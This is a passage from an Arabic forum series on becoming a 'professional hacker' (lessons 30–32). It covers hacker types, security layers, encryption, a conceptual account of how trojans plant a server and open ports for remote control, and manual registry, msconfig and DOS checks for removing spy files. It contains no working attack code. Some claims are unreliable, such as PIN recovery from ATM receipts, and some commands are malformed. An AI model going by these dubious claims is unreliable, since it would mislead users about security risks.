أمريكا:كشفت تحريات وكالة التحقيق الفيدرالية الأمريكية هذا العام عن مليون حالة سرقة لأرقام بطاقات الائتمان الواردة بموقع 40 شركة أمريكية تمارس نشاطها عبر الإنترنت وقد استخدموا الابتزاز مع الشركات إما نشر بيانات العملاء أو دفع مبالغ نقدية كبيرة. ويعتقد أنه تم بيع معظم البيانات المسروقة لعصابات الجريمة المنظمة. ويصف ال- FBI هذه العملية بأنها اكبر عملية في تاريخ الشبكة. كذلك أعلنت هيئة النقل البرى الأمريكية أن متسللين صينيين أصابوا نظامها الكمبيوتري بالعطب وذلك في سياق احتجاج على حادث طائرة التجسس وقد وافق ذلك أيضا الذكرى الثانية لقصف الطائرات الأمريكية للسفارة الصينية في بلجراد.
بريطانيا:ماكينات الصرف الآلي, تم السطو عليها مما كبدها خسائر فادحة وصلت إلى 15 مليون جنيه إسترليني من 33 ألف ماكينة خلال عام 2000 .

من هم القراصنة?
إن معظم المتسببين في عمليات القرصنة هم أصلا مبرمجون لديهم دوافع نفسية غير سوية كأنه يقول "أنا هنا ألا تشعرون بي".
ونستطيع تقسيم هؤلاء المؤلفين أو القراصنة إلى ثلاثة أنواع:
1) ذوو القبعات البيضاء: الذين يهاجمون أجهزة الكمبيوتر بطريقة شرعية وبأوامر من السلطة وبهجمات مخططة وينظمون الهجوم عندما يطلب منهم.
2) ذوو القبعات الرمادية: أحيانا يقومون بالمهمة كقراصنة أشرار وأحيانا لهدف آخر. وبعضهم يؤمنون بنظرية "حرية المعلومات أيا كانت هذه المعلومات" بما فيها التي تتعلق بتأمين الأجهزة والشبكات ومعرفة نقاط الضعف.. ولا يرون غضاضة في الهجوم على أي موقع من أجل المزيد من إجراءات الأمن والوقاية.
3) ذوو القبعات السوداء: يهاجمون بهدف سطو مالى أو معلوماتى ضار.
كذلك يجب التفرقة بين نوعين هما Hackers وCrackers فأما Hackers فتكون أفعالهم إما من خلال الهواية أو العمل أصلا لتخريب مواقع هامة أو شراء بعض المنتجات والبرامج بطرق ملتوية, وأيضا الحصول على معلومات هامة من أماكن مختلفة وأخطرهم صانعو الفيروسات وملفات كسر الحماية حيث أنهم مبرمجون متخصصون ذوو قدرات عالية جدا, أما Crackers فهو مستخدم عادى أو هاوي لديه القدرة على البرمجة والبحث الجيد على صفحات الإنترنت للوصول إلى ملفات كسر الحماية بغرض استعمالها وأيضا يكون من أصحاب النسخ غير القانوني للبرامج.

من هو المتهم في الجريمة الإلكترونية ?
1- مهاجم محترف من خارج الكيان.
2- عميل من داخل الكيان.
3- مهاجم محترف من داخل الكيان.
4- مجهول محترف. 5- مجهول هاوي.






ما هي الطبقات الأمنية?

1- الأمن الطبيعي.
2- أمن الوصول.
3- التشفير.
4- الأمن الإلكتروني (الأمن عن بعد).

لماذا هذه الطبقات الأمنية?
كان من المعروف أن كسر الأمن الطبيعي هو انتهاك أمن شبكة أو نظام من مستخدم قانوني للشبكة أو النظام.
و الآن أصبح هناك وسائل الاختراق البسيط عن بعد مثل الفيروسات والديدان وكلها تعمل مستقلة عن الجهة التي زرعتها, وهناك أنواع اختراق عن بعد تظل على اتصال بالجهة التي زرعتها (وهى الأخطر) مثل حصان طروادة... وفى كل الأحوال فإن هذه الأنواع عبارة عن جزء من شفرة تلحق ببرنامج أو ملف أو مكان شرعي...وبالتأكيد هناك أنواع أخرى ...!! لذلك فقد يحتاج الأمن الطبيعي إلى طبقة أمنية أخرى مثل أمن الوصول . وبالطبع, فإن أمن الوصول قد يفرض قيودا أمنية أخرى على النظام, منها قيود زمنية أو قيود مكانية مثل:
1- فرض زمن معين للدخول وبعده يتم إلغاء كلمة السر.
2- عدم الدخول من مكان غير مصرح به لشخص قانوني .
3- إعطاء فرصة ثلاثة أخطاء في كلمة السر ثم الإلغاء.
4- إلغاء العمل عند ترك النقطة أو العقدة (الجزء المتصل بالنظام) لمدة محدده حيث يتم الإيقاف الأتوماتيكي Auto - logoff.
5- غيرها.
وفى كثير من الاحيان يتم اللجوء إلى سياسة تحديد المستخدم Identification وتوثيق الاستخدام Authentication:

عناصر تحديد المستخدم:
- كلمة المرور
- بصمة الصوت
- بصمة الإصبع / الكف
- شبكية العين
- غيرها

عناصر توثيق الاستخدام:
- كلمة السر
- معلومات إضافية تطلب من المستخدم
- غيرها
وفي التطبيقات الأكثر حساسية, مثل البنوك قد يكون مطلوب أكثر من كلمة سر أو شفرة لتوثيق ونقل الأموال من بنك إلي آخر أو من حساب إلى آخر. ويعيب هذه الطريقة أن على المستخدم أن يتذكر أو يكتب في مكان ما كل كلمات السر المتعددة, وكذلك عليه أن يحفظ ترتيب الدخول باستخدامها.
وهناك طريقة أخرى تخول للمستخدم الوصول إلى مستويات مختلفة من النظام مثل:
1- قراءة الملفات فقط.
2- الكتابة على الملفات.
3- تنفيذ الأوامر على الملف.
4- إلغاء الملفات.
ويعيب هذه الطريقة أيضا احتياجها لنظام مطابقة مركزي مما يتطلب سعة تخزينية كبيرة قد تزيد من احتمالات الاختراق.
ومع الإمكانيات الأخرى للاختراق عبر البرمجيات كبيرة الحجم وعبر منافذ الشبكة الدولية فقد ظهرت طبقة التشفير.

ما هو التشفير?
جعل البيانات غير مفهومة (بدون مفتاح الشفرة).

مفتاح التشفير:
ويتطلب تحديده عناصر عديدة منها:
الإنشاء - التوزيع - التخزين - الحماية - الاسترداد - معايير الأداء.

معايير تشفير البيانات:
معايير تشفير البيانات هى وسائل قياسية تحددها جهات متعددة, مثل
DES (Data Encryption Standards) وهناك العديد من الأنواع الأخرى المعروفة وغير المعروفة.
ما هي أمثلة مفاتيح التشفير?
1- المفتاح العام والمفتاح الخاص.
2- مفتاح الباب الخلفي.
3- المفتاح السري.
4- شريحة كليبر.
5- غيرها.

ما هي وسائل التراسل غير الآمنة التي قد تحتاج إلى تشفير?
- الراديو أو اللاسلكي.
- الخطوط الموصلة بين المرسل والمرسل إليه في أي شبكة.
- الحاسبات الآلية (مراكز الإرسال والاستقبال).
إن تحويل نص غير مشفر Plain Text إلى نص مشفر Cipher Text يحتاج إلى مفتاح الشفرة. ويعد تحويل نص الشفرة إلى نص غير مشفر بدون مفتاح التشفير أمرا صعبا ويتوقف مدى الصعوبة على عناصر عديدة منها:
1- المفتاح.
2- أدوات وأجهزة التشفير.
3- عناصر أخرى.

ولكن هل التشفير هو نهاية المطاف ?
والإجابة لا.
حيث أن الكلام عن الأمن الإلكتروني ( الأمن عن بعد) اصبح حقيقة وليس مجرد خيال علمي يختلف البعض على صياغته في المسلسلات والأفلام !!!
والخلاصة أن معظم وسائل الأمن المعروفة هي وسائل تأخير, منها البدائي ومنها المتقدم ومنها المتطور باستمرار ولأن معظم صناع وسائل الحماية يعتمدون على النظم والبرمجيات فإنهم دائما يقولون أن الناس هم أضعف وصلة أمن !!!
الرجوع الى أعلى الصفحة اذهب الى الأسفل
هكر بغداد
عفروتو مرعب
عفروتو مرعب
هكر بغداد


ذكر
عدد الرسائل : 820
العمر : 39
ساكن فين : السويد
تاريخ التسجيل : 17/05/2007

كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 Empty
مُساهمةموضوع: الدرس الثلاثون   كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 I_icon_minitimeالإثنين أغسطس 06, 2007 4:12 am

الدرس الثلاثون
تعريف الأختراق

الإختراق بشكل عام هو القدرة على الوصول لهدف معين بطريقة غير مشروعة عن طريق ثغرات في نظام الحماية الخاص بالهدف وبطبيعة الحال هي سمة سيئة يتسم بها المخترق لقدرته على دخول أجهزة الأخرين عنوه ودون رغبة منهم وحتى دون علم منهم بغض النظر عن الأضرار الجسيمة التي قد يحدثها سواء بأجهزتهم الشخصية او بنفسياتهم عند سحبة ملفات وصور تخصهم وحدهم . ما الفرق هنا بين المخترق للأجهزة الشخصية والمقتحم للبيوت المطمئنة الآمنه ؟؟ أرائيتم دناءة الأختراق وحقارته.
أسباب الإختراق ودوافعه
لم تنتشر هذه الظاهرة لمجرد العبث وإن كان العبث وقضاء وقت الفراغ من أبرز العوامل التي ساهمت في تطورها وبروزها الي عالم الوجود . وقد أجمل المؤلفين الثلاثة للمراجع التي استعنت بها في هذة الدروة الدوافع الرئيسية للأختراق في ثلاث نقاط اوجزها هنا على النحو التالي :
1- الدافع السياسي والعسكري: ممالاشك فيه أن التطور العلمي والتقني أديا الي الأعتماد بشكل شبة كامل على أنظمة الكمبيوتر في أغلب الاحتياجات التقنية والمعلوماتية. فمنذ الحرب البارردة والصراع المعلوماتي والتجسسي بين الدولتين العظميين على أشده. ومع بروز مناطق جديده للصراع في العالم وتغير الطبيعة المعلوماتيه للأنظمة والدول ، اصبح الأعتماد كليا على الحاسب الألي وعن طريقة اصبح الاختراق من اجل الحصول على معلومات سياسية وعسكرية واقتصادية مسالة أكثر أهمية.
2- الدافع التجاري: من المعروف أن الشركات التجارية الكبرى تعيش هي ايضا فيما بينها حربا مستعرة ( الكوكا كولا والبيبسي كولا على سبيل المثال) وقد بينت الدراسات الحديثة أن عددا من كبريات الشركات التجارية يجرى عليها أكثر من خمسين محاولة إختراق لشبكاتها كل يوم.
3- الدافع الفردي: بداءت اولى محاولات الأختراق الفردية بين طلاب الجامعات بالولايات المتحدة كنوع من التباهي بالنجاح في إختراق اجهزة شخصية لأصدقائهم ومعارفهم ومالبثت أن تحولت تلك الظاهرة الي تحدي فيما بينهم في اختراق الأنظمة بالشركات ثم بمواقع الأنترنت. ولايقتصر الدافع على الأفراد فقط بل توجد مجموعات ونقابات اشبة ماتكون بالأنديه وليست بذات أهداف تجارية. بعض الأفراد بشركات كبرى بالولايات المتحدة ممن كانوا يعملون مبرمجين ومحللي نظم تم تسريحهم من اعمالهم للفائض الزائد بالعمالة فصبوا جم غضبهم على انظمة شركاتهم السابقة مفتحمينها ومخربين لكل ماتقع ايديهم علية من معلومات حساسة بقصد الأنتقام . وفي المقابل هناك هاكرز محترفين تم القبض عليه بالولايات المتحدة وبعد التفاوض معهم تم تعيينهم بوكالة المخابرات الأمريكية الس أي اي وبمكتب التحقيقات الفيدرالي الأف بي أي وتركزت معظم مهماتهم في مطاردة الهاكرز وتحديد مواقعهم لأرشاد الشرطة اليهم .
أنواع الأختراق
يمكن تقسيم الإختراق من حيث الطريقة المستخدمة الي ثلاثة أقسام:
1- إختراق المزودات او الأجهزة الرئيسية للشركات والمؤسسات او الجهات الحكومية وذلك بأختراق الجدران النارية التي عادة توضع لحمايتها وغالبا مايتم ذلك باستخدام المحاكاة Spoofing وهو مصطلح يطلق على عملية إنتحال شخصية للدخول الي النظام حيث أن حزم الـ IP تحتوي على عناوين للمرسل والمرسل اليه وهذة العناوين ينظر اليها على أنها عناوين مقبولة وسارية المفعول من قبل البرامج وأجهزة الشبكة . ومن خلال طريقة تعرف بمسارات المصدر Source Routing فإن حزم الـ IP قد تم اعطائها شكلا تبدو معه وكأنها قادمة من كمبيوتر معين بينما هي في حقيقة الأمر ليست قادمة منه وعلى ذلك فإن النظام إذا وثق بهوية عنوان مصدر الحزمة فإنه يكون بذلك قد حوكي (خدع) وهذة الطريقة هي ذاتها التي نجح بها مخترقي الهوت ميل في الولوج الي معلومات النظام قبل شهرين.
2- إختراق الأجهزة الشخصية والعبث بما تحوية من معلومات وهي طريقة للأسف شائعة لسذاجة اصحاب الأجهزة الشخصية من جانب ولسهولة تعلم برامج الأختراقات وتعددها من جانب اخر.
3- التعرض للبيانات اثناء انتقالها والتعرف على شيفرتها إن كانت مشفرة وهذة الطريقة تستخدم في كشف ارقام بطاقات الأئتمان وكشف الأرقام السرية للبطاقات البنكيه ATM وفي هذا السياق نحذر هنا من امرين لايتم الأهتمام بهما بشكل جدي وهما عدم كشف ارقام بطاقات الأئتمان لمواقع التجارة الألكترونية إلا بعد التأكد بألتزام تلك المواقع بمبداء الأمان . أما الأمر الثاني فبقدر ماهو ذو أهمية أمنية عالية إلا أنه لايؤخذ مأخذ الجديه . فالبعض عندما يستخدم بطاقة السحب الألي من مكائن البنوك النقدية ATM لاينتظر خروج السند الصغير المرفق بعملية السحب او انه يلقي به في اقرب سلة للمهملات دون ان يكلف نفسه عناء تمزيقة جيدا . ولو نظرنا الي ذلك المستند سنجد ارقاما تتكون من عدة خانات طويله هي بالنسبة لنا ليست بذات أهمية ولكننا لو أدركنا بأن تلك الأرقام ماهي في حقيقة الأمر الا إنعكاس للشريط الممغنط الظاهر بالجهة الخلفية لبطاقة الـ ATM وهذا الشريط هو حلقة الوصل بيننا وبين رصيدنا بالبنك الذي من خلالة تتم عملية السحب النقدي لأدركنا اهمية التخلص من المستند الصغير بطريقة مضمونه ونقصد بالضمان هنا عدم تركها لهاكر محترف يمكنه استخراج رقم الحساب البنكي بل والتعرف على الأرقام السرية للبطاقة البنكية ATM .
اثار الأختراق:
1- تغيير الصفحة الرئيسية لموقع الويب كما حدث لموقع فلسطيني مختص بالقدس حيث غير بعض الشباب الإسرائيلي الصور الخاصة بالقدس الي صور تتعلق بالديانه اليهودية بعد عملية إختراق مخطط لها.
2- السطو بقصد الكسب المادي كتحويل حسابات البنوك او الحصول على خدمات مادية او اي معلومات ذات مكاسب مادية كأرقام بطاقات الأئتمان والأرقام السرية الخاصة ببطاقات الـ ATM
3- إقتناص كلمات السر التي يستخدمها الشخص للحصول على خدمات مختلفة كالدخول الي الانترنت حيث يلاحظ الضحية ان ساعاته تنتهي دون ان يستخدمها وكذلك انتحال شخصية في منتديات الحوار كما حدث للأخت الدانه بهذة الساحة. والأن وبعد هذة العجالة هل فكرتم بخطورة الاختراق ؟! هل خطر على احدكم بأن جهازة قد اخترق ؟؟ وكيف له أن يعرف ذلك قبل أن يبداء التخلص من ملفات التجسس ؟
الرجوع الى أعلى الصفحة اذهب الى الأسفل
هكر بغداد
عفروتو مرعب
عفروتو مرعب
هكر بغداد


ذكر
عدد الرسائل : 820
العمر : 39
ساكن فين : السويد
تاريخ التسجيل : 17/05/2007

كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 Empty
مُساهمةموضوع: الدرس الواحد والثلاثين   كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 I_icon_minitimeالإثنين أغسطس 06, 2007 4:13 am


الدرس الواحد والثلاثين
تعريف الهاكر

أطلقت هذة الكلمة اول ما أطلقت في الستينيات لتشير الي المبرمجين المهرة القادرين على التعامل مع الكمبيوتر ومشاكله بخبرة ودراية حيث أنهم وكانوا يقدمون حلولا لمشاكل البرمجة بشكل تطوعي في الغالب .
بالطبع لم تكن الويندوز او مايعرف بالـ Graphical User Interface او GUI قد ظهرت في ذلك الوقت ولكن البرمجة بلغة البيسيك واللوغو والفورتوران في ذلك الزمن كانت جديرة بالأهتمام . ومن هذا المبداء غدى العارفين بتلك اللغات والمقدمين العون للشركات والمؤسسات والبنوك يعرفون بالهاكرز وتعني الملمين بالبرمجة ومقدمي خدماتهم للأخرين في زمن كان عددهم لايتجاوز بضع الوف على مستوى العالم أجمع. لذلك فإن هذا الوصف له مدلولات إيجابية ولايجب خلطه خطأ مع الفئة الأخرى الذين يسطون عنوه على البرامج ويكسرون رموزها بسبب إمتلاكهم لمهارات فئة الهاكرز الشرفاء. ونظرا لما سببته الفئة الأخيرة من مشاكل وخسائر لا حصر لها فقد أطلق عليهم إسما مرادفا للهاكرز ولكنه يتداول خطأ اليوم وهو (الكراكرز) Crackers. كان الهاكرز في تلك الحقبة من الزمن يعتبرون عباقرة في البرمجة فالهاكر هو المبرمج الذي يقوم بتصميم أسرع البرامج والخالي في ذات الوقت من المشاكل والعيوب التي تعيق البرنامج عن القيام بدورة المطلوب منه. ولأنهم كذلك فقد ظهر منهم إسمان نجحا في تصميم وإرساء قواعد أحد البرامج المستخدمة اليوم وهما دينيس ريتشي وكين تومسون اللذان نجحا في اواخر الستينيات في إخراج برنامج اليونيكس الشهير الي حيز الوجود. لذلك فمن الأفضل عدم إطلاق لقب الهاكر على الأفراد الذين يدخلون عنوة الي الأنظمة بقصد التطفل او التخريب بل علينا إطلاق لقب الكراكرز عليهم وهي كلمة مأخوذة من الفعل Crack بالأنجليزية وتعني الكسر او التحطيم وهي الصفة التي يتميزون بها .
أنواع الكراكرز
قد لايستصيغ البعض كلمة كراكرز التي ادعو بها المخربين هنا لأنه تعود على كلمة هاكرز ولكني سأستخدمها لأعني به المخربين لأنظمة الكمبيوتر وهم على كل حال ينقسمون الي قسمين :
1- المحترفون: هم إما أن يكونوا ممن يحملون درجات جامعية عليا تخصص كمبيوتر ومعلوماتية ويعملون محللي نظم ومبرمجين ويكونوا على دراية ببرامج التشغيل ومعرفة عميقة بخباياها والثغرات الموجودة بها. تنتشر هذة الفئة غالبا بأمريكا وأوروبا ولكن إنتشارهم بداء يظهر بالمنطقة العربية (لايعني هذا أن كل من يحمل شهادة عليا بالبرمجة هو باي حال من الأحوال كراكر) ولكنه متى ما إقتحم الأنظمة عنوة مستخدما اسلحته البرمجية العلمية في ذلك فهو بطبيعة الحال احد المحترفين.
2- الهواه: إما أن يكون احدهم حاملا لدرجة علمية تساندة في الأطلاع على كتب بلغات أخرى غير لغته كالأدب الإنجليزي او لديه هواية قوية في تعلم البرمجة ونظم التشغيل فيظل مستخدما للبرامج والتطبيقات الجاهزة ولكنه يطورها حسبما تقتضيه حاجته ولربما يتمكن من كسر شيفرتها البرمجية ليتم نسخها وتوزيعها بالمجان. هذا الصنف ظهر كثيرا في العامين الأخرين على مستوى المعمورة وساهم في إنتشارة عاملين . الأول: إنتشار البرامج المساعدة وكثرتها وسهولة التعامل معها . والأمر الثاني: إرتفاع اسعار برامج وتطبيقات الكمبيوتر الأصلية التي تنتجها الشركات مما حفز الهواة على إيجاد سبل أخرى لشراء البرامج الأصلية بأسعار تقل كثيرا عما وضع ثمنا لها من قبل الشركات المنتجه.
ينقسم الهواة كذلك الي قسمين :
1- الخبير: وهو شخص يدخل للأجهزة دون الحاق الضرر بها ولكنه يميل الي السيطرة على الجهاز فتجده يحرك الماوس عن بعد او يفتح مشغل الأقراص بقصد السيطرة لا أكثر .
2- المبتدي: هذا النوع أخطر الكراكرز جميعهم لأنه يحب أن يجرب برامج الهجوم دون أن يفقه تطبيقها فيستخدمها بعشوائية لذلك فهو يقوم أحيانا بدمار واسع دون أن يدري بما يفعله.
الكراكرز بالدول العربية:
للأسف الشديد كثير من الناس بالدول العربية يرون بأن الكراكرز هم أبطال بالرغم أن العالم كلة قد غير نظرته لهم. فمنذ دخول خدمة الأنترنت للدول العربية في العام 1996 تقريبا والناس يبحثون عن طرق قرصنه جديدة وقد ذكرت اخر الحصائيات بأن هناك اكثر من 80% من المستخدمين العرب تحتوي اجهزتهم على ملفات باتش وهي ملفات تسهل عمل الكراكرز ( ساشرح في نهاية هذا الجزء ثلاث طرق إختبارية للكشف عن ملفات الباتش بالأجهزة الشخصية).
الكراكرز بدول الخليج العربي :
إنتشرت ثقافة الكراكرز كثيرا بدول الخليج العربي خصوصا بالسعودية على رغم دخولها المتأخر لخدمة الأنترنت (يناير 1999) حيث كثرت الشكاوي من عدة افراد وشركات وقد بين الأستبيان الذي أجرته مجلتين عربيتين متخصصتين هما بي سي و إنترنت العالم العربي أن بعض الأجهزة بالدول الخليجية تتعرض لمحاولات إختراق مرة واحدة على الأقل يوميا.
إختبار الكشف عن ملفات التجسس Patch Files :
توجد طرق عديدة لإكتشاف وجود ملفات يمكن من خلالها تضييق الخناق على ملفات التجسس في حال إكتشافها والتخلص منها نهائيا لقطع الطريق على الكراكرز
المتصل بجهاز الضحية وهي على النحو التالي :
الطريقة الأولي : بواسطة ملف تسجيل النظام Registry :
1- أنقر على إبداء Start
2- أكتب في خانة التشغيل Run الأمر : rigedit
3- إفتح المجلدات التالية حسب الترتيب في قائمة Registery Editor :
- HKEY_LOCAL_MACHINE
- Software
- Microsoft
- Windows
- Current Version
- Run
4- والآن من نافذة تسجيل النظام Registry Editor انظر الي يمين النافذة بالشاشة المقسومة ستشاهد تحت قائمة Names أسماء الملفات التي تعمل مع قائمة بدء التشغيل ويقابلها في قائمة Data عنوان الملف .
5- لاحظ الملفات جيدا فإن وجدت ملف لايقابلة عنوان بالـ Data او قد ظهر امامة سهم صغير <--- فهو ملف تجسس إذ ليس له عنوان معين بالويندوز.
6- تخلص منه بالضغط على الزر الأيمن للفارة ثم Delete
--------------------------
الطريقة الثانية بواسطة الأمر :msconfig
1- انقر ابداء Start
2- اكتب في خانة التشغيل Run الأمر التالي : msconfig
3- سوف تظهر لك نافذة System Configuration Utility أختر لسان التبويب Start up
4- ستظهر لك شاشة تعرض البرامج التي تبداء العمل مباشرة مع بدء التشغيل
5- إفحص هذة البرامج جيدا بالنظر فإن شككت بوجود برامج غريبة لم تقم أنت بتثبيتها بجهازك فقم بالغاء الإشارة الظاهرة بالمربع الصغير المقابل له فتكون بذلك قد اوقفت عمل البرنامج التجسسي او غيره من البرامج الغير مرغوب بها.
--------------------------
الطريقة الثالثة بواسطة الدوس Dos:
هذة الطريقة كانت تستخدم قبل ظهور الويندوز وهي من اسهل الطرق :
1- إفتح الدوس من محث MSDos بقائمة إبداء
2- أكتب الأمر التالي : C:/Windowsdir patch.*
3- إن وجدت ملف الباتش فقم بمسحة بالطريقة التالية:
C:Windowsdelete patch.*
في الحلقة الدراسية القادمة إن شاء الله سنتعلم ميكانيكية الاختراق وكيف يتم عن طريق الريموت والسيطرة على الأجهزة والأنظمة عن بعد وسنتطرق للبرامج التي تستخدم في ذلك وطريقة عملها (كيف تعمل وليس كيف يعمل بها) وأيضا سنتحدث عن الطرق التي يمكن بها إعاقة عمل تلك البرامج دون علم من الكراكرز .
الرجوع الى أعلى الصفحة اذهب الى الأسفل
هكر بغداد
عفروتو مرعب
عفروتو مرعب
هكر بغداد


ذكر
عدد الرسائل : 820
العمر : 39
ساكن فين : السويد
تاريخ التسجيل : 17/05/2007

كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 Empty
مُساهمةموضوع: الدرس الثاني والثلاثين   كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 I_icon_minitimeالإثنين أغسطس 06, 2007 4:14 am


الدرس الثاني والثلاثين
ميكانيكية الإختراق
بدا الشغل الحلو


يعتمد الاختراق على السيطرة عن بعد Remote وهي لاتتم الا بوجود عاملين مهمين : الأول البرنامج المسيطر ويعرف بالعميل Client والثاني الخادم Server الذي يقوم بتسهيل عملية الأختراق ذاتها.
وبعبارة أخرى لابد من توفر برنامج على كل من جهازي المخترق والضحية ففي جهاز الضحية يوجد برنامج الخادم وفي جهاز المخترق يوجد برنامج العميل . تختلف طرق إختراق الأجهزة والنظم بإختلاف وسائل الإختراق ، ولكنها جميعا تعتمد على فكرة توفر إتصال عن بعد بين جهازي الضحية والذي يزرع به الخادم (server) الخاص بالمخترق ، وجهاز المخترق على الطرف الأخر حيث يوجد برنامج المستفيد او العميل Client وهناك ثلاث طرق شائعة لتنفيذ ذلك :
1) عن طريق ملفات أحصنة طروادة Trojan : لتحقيق نظرية الأختراق لابد من توفر بريمج تجسسي يتم إرسالة وزرعة من قبل المستفيد في جهاز الضحيه ويعرف بالملف اللاصق ويسمى (الصامت) أحيانا وهوملف باتش patch صغير الحجم مهمته الأساسية المبيت بجهاز الضحيه (الخادم) وهو حلقة الوصل بينه وبين المخترق (المستفيد) .
كيفية الإرسال والاستقبال :
تقوم الفكرة هنا على إرسال ملف باتش صغير هذا الملف يعرف باسم حصان طروادة لأنه يقوم بمقام الحصان الخشبي الشهير في الأسطورة المعروفة الذي ترك امام الحصن وحين ادخله اليه الناس خرج من داخلة الغزاة فتمكنوا من السيطرة والإستيلا على الحصن . ملفنا الصغير الفتاك هذا ربما يكون اكثر خبثا من الحصان الخشبي بالرواية لأنه حالما يدخل لجهاز الضحية يغير من هيئته فلو فرضنا بأن إسمه mark.exe وحذرنا منه صديق فأننا سنجده يحمل اسما اخرا بعد يوم او يومين . لهذا السبب تكمن خطورة احصنه طراودة فهي من جانب تدخل للأجهزة في صمت وهدوء ، ويصعب اكتشافها من جانب اخر في حالة عدم وجود برنامج جيد مضاد للفيروسات .
لاتعتبر احصنة طروادة فيروسات وإن كانت برامج مضادات الفيروسات تعتبرها كذلك فهي بالمقام الأول ملفات تجسس ويمكن أن يسيطر من خلالها المستفيد سيطرة تامه على جهاز الضحية عن بعد وتكمن خطورتها في كونها لاتصدر اية علامات تدل على وجودها بجهاز الخادم.
كيفية الأرسال :
تتم عملية إرسال بريمجات التجسس بعدة طرق من اشهرها البريد الألكتروني حيث يقوم الضحية بفتح المرفقات المرسلة ضمن رسالة غير معروفة المصدر فيجد به برنامج الباتش المرسل فيظنه برنامجا مفيدا فيفتحه او أنه يفتحه من عامل الفضول ليجده لايعمل بعد فتحة فيتجاهلة ظانا بأنه معطوب ويهمل الموضوع بينما في ذلك الوقت يكون المخترق قد وضع قدمه الأولى بداخل الجهاز ( يقوم بعض الأشخاص بحذف الملف مباشرة عند إكتشافهم بأنه لايعمل ولكن يكون قد فات الأوان لأن ملف الباتش من هذا النوع يعمل فورا بعد فتحة وإن تم حذفه كما سنرى فيما بعد) .
هناك طرق أخرى لزرع أحصنه طروادة غير البريد الألكتروني كأنتقاله عبر المحادثة من خلال برنامج الـ ICQ وكذلك عن طريق إنزال بعض البرامج من احد المواقع الغير موثوق بها . كذلك يمكن اعادة تكوين حصان طروادة من خلال الماكرو الموجودة ببرامج معالجات النصوص.
كيفية الإستقبال:
عند زرع ملف الباتش في جهاز الضحية (الخادم) فأنه يقوم مباشرة بالأتجاه الي ملف تسجيل النظام Registry لأنه يؤدي ثلاثة امور رئيسية في كل مرة يتم فيها تشغيل الجهاز : (1) فتح بوابة او منفذ ليتم من خلالها الاتصال (2) تحديث نفسه وجمع المعلومات المحدثة بجهاز الضحية إستعدادا لأرسالها للمخترق فيما بعد (3) وتحديث بيانات المخترق (المستفيد) في الطرف الأخر . تكون المهمة الرئيسية لملف الباتش فور زرعة مباشرة فتح منفذ إتصال داخل الجهاز المصاب تمكن برامج المستفيد (برامج الإختراقات) من النفوذ. كما أنه يقوم بعملية التجسس بتسجيل كل مايحدث بجهاز الضحية او انه يقوم بعمل اشياء اخرى حسب مايطلبه منه المستفيد كتحريك الماوس او فتح باب محرك السي دي وكل ذلك يتم عن بعد.
بوابات الأتصال Ports
يتم الاتصال بين الجهازين عبر بوابات ports او منافذ اتصال وقد يظن البعض بأنها منافذ مادية في امكانه رؤيتها كمنافذ الطابعة والفأرة ولكنها في واقع الأمر جزء من الذاكرة له عنوان معين يتعرف علية الجهاز بأنه منطقة إتصال يتم عبره ارسال واستقبال البيانات ويمكن استخدام عدد كبير من المنافذ للأتصال وعددها يزيد عن 65000 يميز كل منفذ عن الاخر رقمه فمثلا المنفذ رقم 1001 يمكن اجراء اتصال عن طريقة وفي تفس اللحظه يتم استخدام المنفذ رقم 2001 لإجراء اتصال اخر.
التواصل :
قلنا بأن المخترق قد تمكن من وضع قدمة الأولى بداخل جهاز الضحية بعد زرع ملف الباتش به ورغم خطورة وجود هذا الملف بجهاز الضحية فأنه يبقى في حالة خمول طالما لم يطلب منه المخترق التحرك فهو مجرد خادم ينفذ مايصدر له من اوامر ولكن بدونه لايتمكن المخترق من السيطرة على جهاز الضحية عن بعد ، وحتى يتم له ذلك، فإن على المخترق بناء حلقة وصل متينه بينه وبين الخادم عن طريق برامج خاصة تعرف ببرامج الإختراق . من جانب اخر تبقى احصنة طروادة عديمة الفائدة إن لم يتمكن المخترق من التعامل معها وهي تفقد ميزتها الخطرة حالما يتم اكتشافها والتخلص منها كما اوضحت بالحلقة الدراسية السابقة. وهناك عامل ممتاز يساهم في تحقيق هذة الميزة فبرامج مضادات الفيروسات الجيدة تكتشف ملفات الباتش الحاملة لأحصنة طروادة وتمنعها من الدخول للأجهزة لهذا يؤكد كل من له المام بالمعلوماتية أن تزود دائما الأجهزة الشخصية ببرامج مضادات الفيروسات وتحديثها بين الحين والأخر لأنها الخطوة الأولى للوقاية من الأختراقات ، كذلك علينا أن نتعود على عدم تمكين عامل الفضول من الولوج الي انفسنا فلانفتح اية مرفقات للبريد الألكتروني مجهول المصدر مهما كانت المغريات.
2) عن طريق الـ IP Address : ذكرت بأن ملفات الباتش الحاملة لأحصنة طروادة هي حلقة الوصل بين المخترق والضحية ، ولكن في واقع الأمر فإن ملفات الباتش ليست إلا طريقة واحدة لتحقيق التواصل . عند إتصالك بالأنترنت تكون معرض لكشف الكثير من المعلومات عنك كعنوان جهازك وموقعه ومزود الخدمة الخاص بك وتسجيل كثير من تحركاتك على الشبكة. ولاتتعجب كثيرا حين تعلم بأن كثيرا من المواقع التي تزورها تفتح سجلا خاصا بك يتضمن عنوان الموقع الذي جئت منه IP Address ونوع الكمبيوتر والمتصفح الذي استخدمته بل وحتى نوع معالج جهازك وسرعته ومواصفات شاشاتك وتفاصيل كثيرة.
كيف تم معرفة كل ذلك ؟ يمكنك التحقق من هذا السؤال لو انك زرت الموقع التالي :
http://www.privacy.net/
او الموقع التالي :
http://www.consumer.net/
بعد التسجيل اطلب من احد الموقعين فحص جهازك اثناء اتصالك بالأنترنت وستفاجأ بالنتيجة .
